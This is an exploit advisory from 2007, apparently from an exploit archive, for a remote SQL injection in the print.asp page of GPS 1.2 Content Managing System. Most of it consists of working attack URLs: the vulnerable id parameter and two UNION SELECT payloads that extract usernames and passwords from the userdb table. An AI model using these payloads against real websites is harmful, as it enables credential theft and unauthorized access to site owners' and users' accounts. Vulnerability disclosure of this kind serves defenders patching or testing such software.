gps12-sql.txt
Posted on 27 January 2007
******************************************************************************* # Title : GPS 1.2 Content Managing System (print.asp) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://www.guox.de || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7227&lngWId=4 # $$ : Free ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//print.asp?id=[SQL] Example: //print.asp?id=-1%20union%20select%200,0,0,Benutzername,0%20from%20userdb%20where%20ID=10 //print.asp?id=-1%20union%20select%200,0,0,Passwort,0%20from%20userdb%20where%20ID=10 [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!